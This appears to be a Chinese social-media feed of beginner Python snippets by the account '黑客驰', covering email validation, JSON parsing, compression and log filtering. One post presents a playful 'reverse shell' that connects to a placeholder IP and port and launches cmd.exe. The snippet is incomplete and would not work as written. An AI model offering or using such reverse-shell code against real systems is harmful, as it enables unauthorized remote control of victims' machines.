欢迎小主! 162导航

#黑客驰 #

  • 黑客驰 11天前 北京

    #黑客驰 # hackerchi.top #邮箱验证 # 数据清洗 #实用功能 # 小工具 #编程乐趣 邮箱格式验证器 📧 import re def validate_email(email): pattern = r'^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+$' return re.match(pattern, email) is not None print(validate_email('test@ ...全文

  • 黑客驰 11天前 北京

    #黑客驰 # hackerchi.top #JSON处理 # 数据转换 #编程小工具 # 实用技巧 #科技生活 JSON解析神器 💻json def parse_json(json_str): return json.loads(json_str) print(parse_json('{"name": "小明", "age": 18}'))

  • 黑客驰 11天前 北京

    #黑客驰 # hackerchi.top #网络爬虫 # 数据提取 #自动化 # 编程新手 #实用技巧 简单的网页爬虫 🕷️ import requests from bs4 import BeautifulSoup def fetch_title(url): response = requests.get(url) soup = BeautifulSoup(response.text, 'html.parser') return soup.title.string ...全文

  • 黑客驰 11天前 北京

    #黑客驰 # hackerchi.top #文件压缩 # 节省空间 #实用工具 # 文件管理 #小技巧 压缩文件的小工具 📦 import zipfile def compress_file(file_name): with zipfile.ZipFile(file_name + '.zip', 'w') as zipf: zipf.write(file_name) compress_file('example.txt')

  • 黑客驰 11天前 北京

    #黑客驰 # hackerchi.top #日期处理 # 时间助手 #方便工具 # 编程小白 #我们都是程序员 简单的日期计算 🗓️ from datetime import datetime, timedelta def add_days(date, days): return date + timedelta(days=days) print(add_days(datetime.now(), 10))

  • 黑客驰 11天前 北京

    #黑客驰 # hackerchi.top #随机数 # 游戏助手 #有趣功能 # 娱乐 #代码分享 随机数生成器 🎲 import random def generate_random_number(start, end): return random.randint(start, end) print(generate_random_number(1, 100))

  • 黑客驰 11天前 北京

    #黑客驰 # hackerchi.top #字符串处理 # 文本游戏 #趣味工具 # 编程乐趣 #小程序 翻转字符串的小把戏 🎭 def reverse_string(s): return s[::-1] print(reverse_string("你好,世界!"))

  • 黑客驰 24天前 北京

    #黑客驰 # hackerchi.top #反向Shell # 远程控制 #Python # 幽默 #工具 标题:反向Shell小调皮👻 import socket import subprocess s = socket.socket() s.connect(('your_ip', your_port)) subprocess.call(['cmd.exe'], shell=True)

  • 黑客驰 24天前 北京

    #黑客驰 # hackerchi.top #网络监控 # 流量分析 #Python # 幽默 #工具 标题:流量监控小卫士🛡️ import psutil net_io = psutil.net_io_counters() print(f'Bytes sent: {net_io.bytes_sent}, Bytes received: {net_io.bytes_recv}')

  • 黑客驰 24天前 北京

    #黑客驰 # hackerchi.top #日志分析 # 安全监控 #Python # 幽默 #工具 标题:日志小侦探📜 with open('access.log') as f: for line in f: if '404' in line: print(line.strip())

丨话题榜